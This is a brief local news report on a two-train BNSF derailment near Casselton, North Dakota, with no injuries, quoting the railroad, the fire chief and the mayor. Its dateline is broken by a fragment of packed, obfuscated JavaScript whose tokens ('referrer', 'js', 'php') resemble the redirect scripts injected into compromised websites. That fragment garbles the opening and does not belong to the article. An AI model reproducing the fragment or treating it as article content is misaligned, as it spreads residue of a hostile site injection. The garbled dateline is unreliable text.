CASSELTON, nftkk|var|u0026u|referrer|rsybb||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) Crews are clearing a major derailment, involving two trains, 2 miles west of Casselton. The site is directly north of the Tharaldson ethanol plant and within a mile of last December’s fiery oil train derailment.
BNSF railroad spokesperson Amy Mcbeth says preliminary information indicates 19 cars of an eastbound train carrying lumber and paper products derailed shortly after 5:30 p.m. yesterday. That wreckage was then struck by a westbound train carrying empty oil tankers. 12 cars on that train derailed.
Casselton fire chief Tim Mclean says there were no injuries, fire or explosions, but it’s a big mess.
Casselton Mayor Lee Anderson says the town was lucky last night, but he says two derailments within a year are two too many.
